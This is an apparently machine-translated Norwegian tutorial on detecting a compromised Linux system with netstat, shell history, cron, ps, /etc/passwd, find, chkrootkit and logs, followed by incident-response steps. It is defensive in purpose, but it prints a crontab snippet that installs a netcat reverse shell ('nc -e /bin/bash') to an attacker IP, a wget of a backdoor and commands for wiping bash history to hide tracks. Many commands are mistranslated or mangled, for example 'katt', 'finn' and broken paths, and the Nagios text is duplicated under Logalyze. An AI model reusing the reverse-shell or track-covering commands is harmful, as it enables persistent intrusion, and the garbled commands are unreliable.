Hvordan avgjøre om et Linux -system er kompromittert

Hvordan avgjøre om et Linux -system er kompromittert
Det er mange grunner til at en hacker ville orme sin vei inn i systemet ditt og forårsake alvorlige problemer. For mange år siden var det kanskje for å vise frem ens ferdigheter, men i dag kan intensjonene bak slike aktiviteter være mye mer komplisert med mye mer vidtrekkende konsekvenser for offeret. Dette kan høres åpenbart ut, men bare fordi "alt virker bra", betyr ikke dette at alt går bra. Hackere kunne trenge gjennom systemet ditt uten å gi deg beskjed og infisere det med skadelig programvare for å ta full kontroll, og til og med for sidevirkning mellom systemer. Malware kan skjules i systemet og fungerer som bakdør eller et kommando- og kontrollsystem for hackere å utføre ondsinnede aktiviteter på systemet ditt.Det er bedre å være trygg enn beklager. Det er ikke sikkert at du umiddelbart er klar over at systemet ditt har blitt hacket, men det er noen måter du kan avgjøre om systemet ditt er kompromittert. Denne artikkelen vil diskutere hvordan du kan avgjøre om din Linux Systemet har blitt kompromittert av en uautorisert person, eller en bot logger inn i systemet ditt for å utføre ondsinnede aktiviteter.

Netstat

NetStat er en viktig kommandolinje TCP/IP-nettverksverktøy som gir informasjon og statistikk om protokoller i bruk og aktive nettverkstilkoblinger.

Vi vil bruke Netstat på et eksempel offermaskin for å se etter noe mistenkelig i de aktive nettverkstilkoblingene via følgende kommando:

ubuntu@ubuntu: ~ $ netstat -antp

Her vil vi se alle aktive tilkoblinger for øyeblikket. Nå vil vi se etter en tilkobling som ikke skal være der.

Her er det, en aktiv forbindelse på port 44999 (en port som ikke skal være åpen).Vi kan se andre detaljer om forbindelsen, for eksempel PID, og programnavnet det kjører i den siste kolonnen. I dette tilfellet PID er 1555 og den ondsinnede nyttelasten den kjører er ./skall.Alv fil.

En annen kommando for å se etter portene som for øyeblikket lytter og er aktiv på systemet ditt, er som følger:

ubuntu@ubuntu: ~ $ netstat -la

Dette er ganske rotete produksjon. For å filtrere ut lytting og etablerte tilkoblinger, bruker vi følgende kommando:

ubuntu@ubuntu: ~ $ netstat -la | grep “lytt” “etablert”

Dette vil gi deg bare resultatene som betyr noe for deg, slik at du lettere kan sortere gjennom disse resultatene. Vi kan se en aktiv forbindelse på Port 44999 I resultatene ovenfor.

Etter å ha gjenkjent den ondsinnede prosessen, kan du drepe prosessen via følgende kommandoer. Vi vil merke PID av prosessen ved å bruke NetStat -kommandoen, og drepe prosessen via følgende kommando:

ubuntu@ubuntu: ~ $ kill 1555

~.Bash-History

Linux fører en oversikt over hvilke brukere som er logget inn i systemet, fra hvilken IP, når og for hvor lang tid.

Du kan få tilgang til denne informasjonen med siste kommando. Utgangen fra denne kommandoen vil se ut som følger:

ubuntu@ubuntu: ~ $ sist

Utgangen viser brukernavnet i første kolonne, terminalen i den andre, kildeadressen i den tredje, påloggingstiden i den fjerde kolonnen, og den totale sesjonstiden logget i den siste kolonnen. I dette tilfellet brukerne usman og Ubuntu er fortsatt logget inn. Hvis du ser noen økt som ikke er autorisert eller ser ondsinnet ut, kan du se den siste delen av denne artikkelen.

Tømmerhistorikken er lagret i ~.Bash-History fil. Så historien kan fjernes enkelt ved å slette .Bash-History fil. Denne handlingen utføres ofte av angripere for å dekke sporene deres.

ubuntu@ubuntu: ~ $ katt .bash_history

Denne kommandoen vil vise kommandoene som kjøres på systemet ditt, med den nyeste kommandoen utført nederst på listen.

Historien kan ryddes via følgende kommando:

ubuntu@ubuntu: ~ $ historie -c

Denne kommandoen vil bare slette historien fra terminalen du bruker for øyeblikket. Så det er en mer korrekt måte å gjøre dette på:

ubuntu@ubuntu: ~ $ cat/dev/null> ~//.bash_history

Dette vil fjerne innholdet i historien, men holder filen på plass. Så hvis du bare ser din nåværende pålogging etter å ha kjørt siste Kommando, dette er ikke et godt tegn i det hele tatt. Dette indikerer at systemet ditt kan ha blitt kompromittert og at angriperen sannsynligvis slettet historien.

Hvis du mistenker en ondsinnet bruker eller IP, logg inn som den brukeren og kjør kommandoen historie, følgende:

ubuntu@ubuntu: ~ $ su
ubuntu@ubuntu: ~ $ historie

Denne kommandoen vil vise kommandohistorikken ved å lese filen .Bash-History i /hjem mappe av den brukeren. Se nøye etter WGET, krøll, eller netcat Kommandoer, i tilfelle angriperen brukte disse kommandoene for å overføre filer eller for å installere ut av repo-verktøy, for eksempel krypto-minister eller spam-roboter.

Ta en titt på eksemplet nedenfor:

Over kan du se kommandoen wget https: // github.com/sajith/mod-rootme.I denne kommandoen prøvde hackeren å få tilgang til en ut av repo -filen ved hjelp av WGET For å laste ned en bakdør som heter “Mod-Root Me” og installer den på systemet ditt. Denne kommandoen i historien betyr at systemet er kompromittert og har blitt bakdørs av en angriper.

Husk at denne filen kan utvistes ellers eller dens stoff produsert. Dataene gitt av denne kommandoen må ikke tas som en klar virkelighet. Likevel, i tilfelle at angriperen kjørte en "dårlig" kommando og unnlatt å evakuere historien, vil den være der.

Cron Jobs

Cron Jobs kan tjene som et viktig verktøy når det er konfigurert til å sette opp et omvendt skall på angripermaskinen. Å redigere Cron Jobs er en viktig ferdighet, og det er å vite hvordan du kan se dem.

For å se Cron -jobbene som kjører for den nåværende brukeren, vil vi bruke følgende kommando:

ubuntu@ubuntu: ~ $ crontab -l

For å se Cron -jobbene som kjører for en annen bruker (i dette tilfellet, Ubuntu), vil vi bruke følgende kommando:

ubuntu@ubuntu: ~ $ crontab -u ubuntu -l

For å se daglige, time-, ukentlige og månedlige Cron -jobber, vil vi bruke følgende kommandoer:

Daily Cron Jobs:

ubuntu@ubuntu: ~ $ ls -la /etc /cron.daglig

Timekronjobber:

ubuntu@ubuntu: ~ $ ls -la /etc /cron.hver time

Ukentlige Cron Jobs:

ubuntu@ubuntu: ~ $ ls -la /etc /cron.ukentlig

Ta et eksempel:

Angriperen kan sette en cronjobb i /etc/crontab som kjører en ondsinnet kommando 10 minutter etter hver time. Angriperen kan også drive en ondsinnet tjeneste eller en omvendt skall -bakdør via netcat eller noe annet verktøy. Når du utfører kommandoen $ ~ crontab -l, Du vil se en Cron -jobb som kjører under:

ubuntu@ubuntu: ~ $ crontab -l
CT = $ (crontab -l)
Ct = $ ct $ '\ n10 * * * * nc -e /bin /bash 192.168.8.131 44999 '
printf "$ ct" | crontab -
PS aux

For å inspisere om systemet ditt har blitt kompromittert, er det også viktig å se løpsprosesser. Det er tilfeller der noen uautoriserte prosesser ikke bruker nok CPU -bruk til å bli oppført i topp kommando. Det er der vi vil bruke PS Kommando for å vise alle som kjører prosesser for øyeblikket.

ubuntu@ubuntu: ~ $ ps auxf

Den første kolonnen viser brukeren, den andre kolonnen viser en unik prosess -ID, og ​​CPU og minnebruk vises i de neste kolonnene.

Denne tabellen vil gi mest informasjon til deg. Du bør inspisere hver løpsprosess for å se etter noe særegent å vite om systemet er kompromittert eller ikke. I tilfelle at du finner noe mistenkelig, Google det eller kjør det med lsof Kommando, som vist ovenfor. Dette er en god vane å løpe PS Kommandoer på serveren din, og det vil øke sjansene dine for å finne noe mistenkelig eller ut av din daglige rutine.

/etc/passwd

De /etc/passwd Filen holder oversikt over hver bruker i systemet. Dette er en kolon -separert fil som inneholder informasjon som brukernavn, UserID, kryptert passord, GroupID (GID), fullt navn på brukeren, brukerhjemkatalog og påloggingsskall.

Hvis en angriper hakker inn i systemet ditt, er det en mulighet for at han eller hun vil opprette noen flere brukere, for å holde ting adskilt eller for å lage en bakdør i systemet ditt for å komme tilbake ved å bruke den bakdøren. Mens du sjekker om systemet ditt har blitt kompromittert, bør du også bekrefte hver bruker i /etc /passwd -filen. Skriv inn følgende kommando for å gjøre det:

ubuntu@ubuntu: ~ $ katt etc/passwd

Denne kommandoen vil gi deg en utdata som ligner på den nedenfor:

Gnome-Initial-Setup: X: 120: 65534 ::/Run/Gnome-Initial-Setup/:/Bin/False
GDM: X: 121: 125: Gnome Display Manager:/var/lib/gdm3:/bin/usann
Usman: X: 1000: 1000: Usman:/Home/Usman:/Bin/Bash
Postgres: x: 122: 128: PostgreSql Administrator ,,,,/var/lib/postgreSql:/bin/bash
Debian-Tor: x: 123: 129 ::/var/lib/tor:/bin/usann
Ubuntu: X: 1001: 1001: Ubuntu ,,,,/Home/Ubuntu:/Bin/Bash
LightDM: X: 125: 132: Light Display Manager:/var/lib/Lightdm:/bin/usann
Debian-GDM: X: 124: 131: Gnome Display Manager:/var/lib/gdm3:/bin/usann
Anonym: X: 1002: 1002: ,,,:/Hjem/Anonym:/Bin/Bash

Nå vil du se etter enhver bruker du ikke er klar over. I dette eksemplet kan du se en bruker i filen som heter “Anonym.”En annen viktig ting å merke seg er at hvis angriperen opprettet en bruker for å logge seg på igjen, vil brukeren også ha et"/bin/bash "-skall som er tilordnet. Så du kan begrense søket ditt ved å grille følgende utdata:

ubuntu@ubuntu: ~ $ cat /etc /passwd | grep -i "/bin/bash"
Usman: X: 1000: 1000: Usman:/Home/Usman:/Bin/Bash
Postgres: x: 122: 128: PostgreSql Administrator ,,,,/var/lib/postgreSql:/bin/bash
Ubuntu: X: 1001: 1001: Ubuntu ,,,,/Home/Ubuntu:/Bin/Bash
Anonym: X: 1002: 1002: ,,,:/Hjem/Anonym:/Bin/Bash

Du kan utføre noen ytterligere "bash -magi" for å avgrense utdataene dine.

ubuntu@ubuntu: ~ $ cat /etc /passwd | grep -i "/bin/bash" | kutt -d ":" -f 1
usman
Postgres
Ubuntu
anonym

Finne

Tidsbaserte søk er nyttige for rask triage. Brukeren kan også endre filendring av tidsstempler. For å forbedre påliteligheten, inkludere CTIME i kriteriene, ettersom det er mye vanskeligere å tukle med fordi det krever endringer av noen nivåfiler.

Du kan bruke følgende kommando for å finne filer som er opprettet og endret de siste 5 dagene:

ubuntu@ubuntu: ~ $ finn / -mtime -o -ctime -5

For å finne alle Suid -filer som eies av roten og for å sjekke om det er noen uventede oppføringer på listene, vil vi bruke følgende kommando:

ubuntu@ubuntu: ~ $ finn / -perm -4000 -bruker root -type f

For å finne alle SGID -filer (Angi bruker -ID) som eies av roten og sjekk om det er noen uventede oppføringer på listene, vil vi bruke følgende kommando:

ubuntu@ubuntu: ~ $ finn / -perm -6000 -type f

Chkrootkit

Rootkits er noe av det verste som kan skje med et system og er et av de farligste angrepene, farligere enn skadelig programvare og virus, både i skaden de forårsaker systemet og vanskeligheter med å finne og oppdage dem.

De er designet på en slik måte at de forblir skjult og gjør ondsinnede ting som å stjele kredittkort og nettbankinformasjon. Rootkits Gi nettkriminelle muligheten til å kontrollere datasystemet ditt. Rootkits hjelper også angriperen med å overvåke tastetrykk og deaktivere antivirusprogramvaren, noe som gjør det enda enklere å stjele din private informasjon.

Denne typen skadelig programvare kan holde seg på systemet ditt i lang tid uten at brukeren engang legger merke til det, og kan forårsake noen alvorlige skader. Først når Rootkit blir oppdaget, det er ingen annen måte enn å installere hele systemet på nytt. Noen ganger kan disse angrepene til og med forårsake maskinvarefeil.

Heldigvis er det noen verktøy som kan bidra til å oppdage Rootkits På Linux -systemer, som Lynis, Clam AV eller LMD (Linux Malware Detect). Du kan sjekke systemet ditt for kjent Rootkits Bruke kommandoene nedenfor.

Først må du installere Chkrootkit via følgende kommando:

ubuntu@ubuntu: ~ $ sudo apt install chkrootkit

Dette vil installere Chkrootkit verktøy. Du kan bruke dette verktøyet for å sjekke for Rootkits via følgende kommando:

ubuntu@ubuntu: ~ $ sudo chkrootkit

Chkrootkit -pakken består av et skallskript som sjekker systembinarier for rootkit -modifisering, samt flere programmer som sjekker for forskjellige sikkerhetsproblemer. I ovennevnte tilfelle sjekket pakken for et tegn på rootkit på systemet og fant ingen. Vel, det er et godt tegn!

Linux -logger

Linux -logger gir en tidsplan for hendelser på Linux Working Framework and Applications, og er et viktig undersøkelsesinstrument når du opplever problemer. Den primære oppgaven en administrator må utføre når han eller hun finner ut at systemet er kompromittert, bør dissekere alle loggposter.

For eksplisitte problemer med arbeidsområdet eksplisitte, holdes loggoppføringer i kontakt med forskjellige områder. For eksempel komponerer Chrome Crash Reports to '~/.Chrome/Crash Reports '), Der et arbeidsområde -applikasjon komponerer logger som er avhengig av ingeniøren, og viser om applikasjonen tar hensyn til tilpasset loggordning. Poster er i/var/log katalog. Det er Linux -logger for alt: rammeverk, porsjoner, buntsjefer, oppstartsformer, Xorg, Apache og MySQL. I denne artikkelen vil temaet konsentrere seg eksplisitt om Linux -rammelogger.

Du kan endre til denne katalogen ved å bruke den kompakte platebestillingen. Du bør ha rottillatelser til å se eller endre loggfiler.

ubuntu@ubuntu: ~ $ cd /var /log

Instruksjoner for å se Linux -logger

Bruk følgende kommandoer for å se nødvendige loggdokumenter.

Linux -logger kan sees med kommandoen CD /var /log, På det tidspunktet ved å komponere rekkefølgen for å se loggene lagt bort under denne katalogen. En av de mest betydningsfulle tømmerstokkene er syslog, som logger mange viktige logger.

ubuntu@ubuntu: katt syslog

For å desinfisere utgangen, vil vi bruke “mindre" kommando.

ubuntu@ubuntu: Cat syslog | mindre

Skriv kommandoen var/log/syslog å se ganske mange ting under syslog -fil. Å fokusere på et bestemt spørsmål vil ta litt tid, siden denne posten vanligvis vil være lang. Trykk på Shift+G for å bla ned i posten til slutt, betegnet med “End.”

Du kan også se loggene ved hjelp av DMESG, som skriver ut delen Ring Support. Denne funksjonen skriver ut alt og sender deg så langt som mulig langs dokumentet. Fra det tidspunktet kan du bruke bestillingen dmesg | mindre å se gjennom utbyttet. I tilfelle du må se loggene for den gitte brukeren, må du kjøre følgende kommando:

dmesg - anlegg = bruker

Avslutningsvis kan du bruke haleordren til å se loggdokumentene. Det er et lite, men nyttig verktøy som man kan bruke, ettersom det brukes til å vise den siste delen av tømmerstokkene, der problemet sannsynligvis skjedde. Du kan også spesifisere antall siste byte eller linjer som skal vises i halekommandoen. For dette, bruk kommandoen hale/var/log/syslog. Det er mange måter å se på logger.

For et bestemt antall linjer (modellen vurderer de siste 5 linjene), skriv inn følgende kommando:

ubuntu@ubuntu: ~ $ tail -f -n 5/var/log/syslog

Dette vil skrive ut de siste 5 linjene. Når en annen linje kommer, vil den tidligere bli evakuert. For å komme deg bort fra halebestillingen, trykk Ctrl+x.

Viktige Linux -logger

De primære fire Linux -logger inkluderer:

  1. Applikasjonslogger
  2. Hendelseslogger
  3. Servicelogger
  4. Systemlogger
ubuntu@ubuntu: Cat syslog | mindre
  • /var/log/syslog eller /var/log/meldinger: Generelle meldinger, akkurat som rammerelaterte data. Denne loggen lagrer all handlingsinformasjon over verdensomspennende rammeverk.
ubuntu@ubuntu: katt authent.logg | mindre
  • /var/log/authent.Logg eller /var/log/sikker: Butikkverifiseringslogger, inkludert både effektive og fizzled påloggings- og valideringsstrategier. Debian og Ubuntu bruker /var/log/authent.Logg å lagre påloggingsforsøk, mens Redhat og Centos bruker /var/log/sikker å lagre autentiseringslogger.
ubuntu@ubuntu: cat boot.logg | mindre
  • /var/log/oppstart.Logg: inneholder informasjon om oppstart og meldinger under oppstart.
ubuntu@ubuntu: Cat Maillog | mindre
  • /var/log/maillog eller /var/log/mail.Logg: lagrer alle logger identifisert med postservere; verdifull når du trenger data om postfix, smtpd eller eventuelle e-postrelaterte administrasjoner som kjører på serveren din.
ubuntu@ubuntu: Cat Kern | mindre
  • /var/log/Kern: inneholder informasjon om kjernelogger. Denne loggen er viktig for å undersøke tilpassede deler.
ubuntu@ubuntu: cat dmesg | mindre
  • /var/log/dmesg: Inneholder meldinger som identifiserer gadgetdrivere. Bestillingen DMESG kan brukes til å se meldinger i denne posten.
ubuntu@ubuntu: katt faillog | mindre
  • /var/log/faillog: Inneholder data om alle fizzled påloggingsforsøk, verdifulle for å plukke opp kunnskapsbiter om forsøk på sikkerhetsgjennomtrengninger; For eksempel de som søker å hacke innloggingsertifiseringer, akkurat som angrep på dyrekraft.
ubuntu@ubuntu: Cat Cron | mindre
  • /var/log/cron: lagrer alle CRON-relaterte meldinger; Cron -sysselsettinger, for eksempel, eller når Cron Daemon startet en yrke, relaterte skuffelsesmeldinger og så videre.
ubuntu@ubuntu: katt yum.logg | mindre
  • /var/log/yum.Logg: På sjansen for at du introduserer bunter som bruker Yum -ordren, lagrer denne loggen alle relaterte data, noe som kan være nyttig for å avgjøre om en bunt og alle segmenter ble introdusert effektivt.
ubuntu@ubuntu: katt httpd | mindre
  • /var/log/httpd/eller/var/log/apache2: Disse to katalogene brukes til å lagre alle typer logger for en Apache HTTP -server, inkludert tilgangslogger og feillogger. Filen er feil_log inneholder alle dårlige forespørsler mottatt av HTTP -serveren. Disse feilene inneholder minneproblemer og andre rammelaterte tabber. Access_log inneholder en oversikt over alle anmodninger mottatt via HTTP.
ubuntu@ubuntu: cat mysqld.logg | mindre
  • /var/log/mysqld.Logg eller/var/log/mysql.Logg : MySQL -loggdokumentet som logger all feil, feilsøking og suksessmeldinger. Dette er en annen forekomst der rammen leder til registeret; Redhat, Centos, Fedora og andre Redhat-baserte rammer bruker/var/log/mysqld.Logg, mens Debian/Ubuntu bruker/var/log/mysql.Loggkatalog.

Verktøy for å se Linux -logger

Det er mange open source loggsporere og eksamensenheter som er tilgjengelige i dag, noe som gjør valg av riktige eiendeler for handlingslogger enklere enn du kanskje mistenker. Gratis og open source loggkontrollene kan jobbe med et hvilket som helst system for å få jobben gjort. Her er fem av de beste jeg har brukt tidligere, i ingen spesifikk rekkefølge.

  • Graylog

Startet i Tyskland i 2011, blir Graylog nå for tiden tilbudt som en åpen kildekode -enhet eller en forretningsarrangement. Graylog er ment å være et sammensatt rammeverk som mottar informasjonsstrømmer fra forskjellige servere eller endepunkter og tillater deg å raskt lese eller bryte ned disse dataene.

Graylog har samlet en positiv beryktethet blant rammehoder som et resultat av dens enkelhet og allsidighet. De fleste webventures starter lite, men kan utvikle seg eksponentielt. Graylog kan justere stabler over et system med backend -servere og håndtere noen få terabyte med logginformasjon hver dag.

IT -styreledere vil se frontenden av Graylog -grensesnittet som enkelt å bruke og kraftig i nytten. Graylog jobber rundt ideen om dashboards, som tillater brukere å velge hvilken type målinger eller informasjonskilder de finner viktige og raskt observerer stigninger etter en tid.

Når en sikkerhets- eller utførelsesepisode oppstår, må den styrelederne ha muligheten til å følge manifestasjonene til en underliggende sjåfør så raskt som med rimelighet kan forventes. Graylogs søkefunksjon gjør denne oppgaven enkel. Dette verktøyet har fungert i tilpasning til intern fiasko som kan kjøre flersprengte ventures, slik at du kan bryte ned noen få potensielle farer sammen.

  • Nagios

Startet av en enkelt utvikler i 1999, har Nagios siden avansert inn i et av de mest solide open source -instrumentene for å føre tilsyn med logginformasjon. Den nåværende gjengivelsen av Nagios kan implementeres i servere som kjører alle slags operativsystem (Linux, Windows, etc.).

Nagios 'essensielle element er en loggserver, som effektiviserer informasjonsutvalg og gjør data gradvis tilgjengelig for rammeledere. Nagios Log Server-motoren vil fange informasjon gradvis og mate den inn i et banebrytende søkeinstrument. Å innlemme et annet sluttpunkt eller applikasjon er en enkel drikkepenger til denne iboende arrangementets veiviser.

Nagios brukes ofte i foreninger som trenger å screene sikkerheten i nabolagene sine og kan gjennomgå et omfang av systemrelaterte anledninger for å hjelpe til med å robotisere formidlingen av advarsler. Nagios kan programmeres for å utføre spesifikke oppgaver når en viss tilstand er oppfylt, noe som lar brukere oppdage problemer selv før et menneskes behov er inkludert.

Som et hovedaspekt ved systemevaluering, vil Nagios kanalisere logginformasjon avhengig av det geografiske området der det starter. Komplette dashbord med kartlegging av innovasjon kan implementeres for å se streaming av netttrafikk.

  • Logalyze

Logalyze produserer åpen kildekodeverktøy for rammedirektører eller SYS-administrerer og sikkerhetsspesialister for å hjelpe dem med å føre tilsyn med serverlogger og la dem fokusere på å transformere logger til verdifull informasjon. Dette verktøyets essensielle vare er at det er tilgjengelig som en gratis nedlasting for enten hjemme- eller forretningsbruk.

Nagios 'essensielle element er en loggserver, som effektiviserer informasjonsutvalg og gjør data gradvis tilgjengelig for rammeledere. Nagios Log Server-motoren vil fange informasjon gradvis og mate den inn i et banebrytende søkeinstrument. Å innlemme et annet sluttpunkt eller applikasjon er en enkel drikkepenger til denne iboende arrangementets veiviser.

Nagios brukes ofte i foreninger som trenger å screene sikkerheten i nabolagene sine og kan gjennomgå et omfang av systemrelaterte anledninger for å hjelpe til med å robotisere formidlingen av advarsler. Nagios kan programmeres for å utføre spesifikke oppgaver når en viss tilstand er oppfylt, noe som lar brukere oppdage problemer selv før et menneskes behov er inkludert.

Som et hovedaspekt ved systemevaluering, vil Nagios kanalisere logginformasjon avhengig av det geografiske området der det starter. Komplette dashbord med kartlegging av innovasjon kan implementeres for å se streaming av netttrafikk.

Hva bør du gjøre hvis du har blitt kompromittert?

Det viktigste er ikke å få panikk, spesielt hvis den uautoriserte personen er signert akkurat nå. Du bør ha muligheten til å ta tilbake kontrollen over maskinen før den andre personen vet at du vet om dem. I tilfelle de vet at du er klar over deres tilstedeværelse, kan angriperen godt holde deg utenfor serveren din og begynne å ødelegge systemet ditt. Hvis du ikke er så teknisk, er alt du må gjøre å slå av hele serveren umiddelbart. Du kan slå av serveren via følgende kommandoer:

ubuntu@ubuntu: ~ $ shutdown -h nå

Eller

ubuntu@ubuntu: ~ $ systemctl poweroff

En annen måte å gjøre dette på er ved å logge inn på vertsleverandørens kontrollpanel og stenge det derfra. Når serveren er slått av, kan du jobbe med brannmurreglene som er nødvendige og rådføre deg med hvem som helst for å få hjelp i din egen tid.

I tilfelle du føler deg mer selvsikker og vertsleverandøren din har en oppstrøms brannmur, og deretter opprette og aktivere følgende to regler:

  • Tillat SSH -trafikk fra bare IP -adressen din.
  • Blokker alt annet, ikke bare SSH, men hver protokoll som kjører på hver port.

For å se etter aktive SSH -økter, bruk følgende kommando:

ubuntu@ubuntu: ~ $ ss | grep ssh

Bruk følgende kommando for å drepe SSH -økten deres:

ubuntu@ubuntu: ~ $ kill

Dette vil drepe deres SSH -økt og gi deg tilgang til serveren. I tilfelle du ikke har tilgang til en oppstrøms brannmur, må du opprette og aktivere brannmurreglene på selve serveren. Når brannmurreglene er satt opp, drep den uautoriserte brukerens SSH -økt via “Kill” -kommandoen.

En siste teknikk, der tilgjengelig, logger deg på serveren ved hjelp av en ut-av-band-tilkobling, for eksempel en seriekonsoll. Stopp alt nettverk via følgende kommando:

ubuntu@ubuntu: ~ $ SystemCTL Stop Network.service

Dette vil stoppe ethvert system som kommer til deg, slik at du nå kan aktivere brannmurkontrollene i din egen tid.

Når du har gjenvunnet kontrollen over serveren, må du ikke stole på den. Ikke prøv å fikse ting og gjenbruke dem på nytt. Det som er ødelagt, kan ikke fikses. Du ville aldri vite hva en angriper kan gjøre, og derfor skal du aldri være sikker på at serveren er sikker. Så installering på nytt bør være ditt endelige trinn.